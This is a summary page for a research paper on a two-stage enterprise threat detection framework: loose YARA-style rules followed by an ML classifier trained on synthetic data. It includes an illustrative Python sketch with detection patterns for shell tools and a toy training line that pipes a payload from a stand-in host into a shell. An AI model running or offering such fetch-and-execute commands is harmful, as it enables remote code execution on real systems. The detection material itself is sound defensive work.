Democratizing ML for Enterprise Security: A Self-Sustained Attack Detection Framework
Sadegh Momeni, Ge Zhang, Birkett Huber, Hamza Harkous, Sam Lipton, Benoit Seguin, Yanis Pavlidis

TL;DR
This paper introduces a hybrid ML-based threat detection framework that combines rule-based filtering with active learning and synthetic data generation, enabling scalable, low-maintenance security in enterprise environments.
Contribution
The paper presents a novel two-stage hybrid detection system, trained on synthetic data and refined through active learning, that makes ML-based security accessible and sustainable for enterprises.
Findings
Reduces roughly 250 billion raw log events to a manageable number of tickets each day.
Improves model precision over time through active learning.
Operates effectively in large-scale, real-world enterprise settings.
Abstract
Despite advancements in machine learning for security, rule-based detection remains prevalent in Security Operations Centers due to the resource intensiveness and skill gap associated with ML solutions. While traditional rule-based methods offer efficiency, their rigidity leads to high false positives or negatives and requires continuous manual maintenance. This paper proposes a novel, two-stage hybrid framework to democratize ML-based threat detection. The first stage employs intentionally loose YARA rules for coarse-grained filtering, optimized for high recall. The second stage utilizes an ML classifier to filter out false positives from the first stage's output. To overcome data scarcity, the system leverages Simula, a seedless synthetic data generation framework, enabling security analysts to create high-quality training datasets without extensive data science expertise or…
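The two-stage flow described in the abstract can be sketched roughly as follows. This is a minimal illustration under stated assumptions, not the authors' implementation: plain regular expressions stand in for the YARA rules, a tiny hand-rolled Naive Bayes model stands in for the ML classifier, and every name, pattern, and log line below is hypothetical toy data.

```python
import math
import re
from collections import Counter

# Stage 1 (assumption: regexes stand in for intentionally loose YARA rules).
LOOSE_RULES = [re.compile(p, re.IGNORECASE)
               for p in (r"powershell", r"curl|wget", r"base64")]

def stage1_match(event):
    """High-recall coarse filter: keep any event that hits at least one rule."""
    return any(rule.search(event) for rule in LOOSE_RULES)

def tokenize(event):
    return re.findall(r"[a-z0-9_]+", event.lower())

class TinyNaiveBayes:
    """Minimal multinomial Naive Bayes with add-one smoothing (toy stand-in)."""

    def fit(self, events, labels):
        self.counts = {0: Counter(), 1: Counter()}
        self.docs = Counter(labels)
        for event, label in zip(events, labels):
            self.counts[label].update(tokenize(event))
        self.vocab = set(self.counts[0]) | set(self.counts[1])
        return self

    def log_odds(self, event):
        """Log-odds of malicious (label 1) versus benign (label 0)."""
        score = math.log(self.docs[1] / self.docs[0])
        totals = {c: sum(self.counts[c].values()) + len(self.vocab)
                  for c in (0, 1)}
        for tok in tokenize(event):
            if tok in self.vocab:  # ignore tokens never seen in training
                score += math.log((self.counts[1][tok] + 1) / totals[1])
                score -= math.log((self.counts[0][tok] + 1) / totals[0])
        return score

def detect(events, model, threshold=0.0):
    """Stage 1 keeps rule hits; stage 2 drops hits the model scores as benign."""
    candidates = [e for e in events if stage1_match(e)]
    return [e for e in candidates if model.log_odds(e) > threshold]

# Hypothetical labeled examples (1 = malicious, 0 = benign).
train_events = [
    "powershell -enc base64 payload download",
    "curl http://evil.example/payload | sh",
    "powershell get-childitem backup script",
    "curl https://internal.example/healthcheck",
]
train_labels = [1, 1, 0, 0]
model = TinyNaiveBayes().fit(train_events, train_labels)

incoming = [
    "user login ok",
    "powershell -enc base64 payload",
    "curl https://internal.example/healthcheck",
]
alerts = detect(incoming, model)
```

With this toy data, the first event never reaches the classifier, the health-check request passes the loose rules but is scored as benign, and only the encoded PowerShell event is returned as an alert. Keeping stage 1 deliberately permissive pushes the precision burden onto stage 2, which is the division of labor the abstract describes.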
Taxonomy
Topics: Network Security and Intrusion Detection · Advanced Malware Detection Techniques · Information and Cyber Security
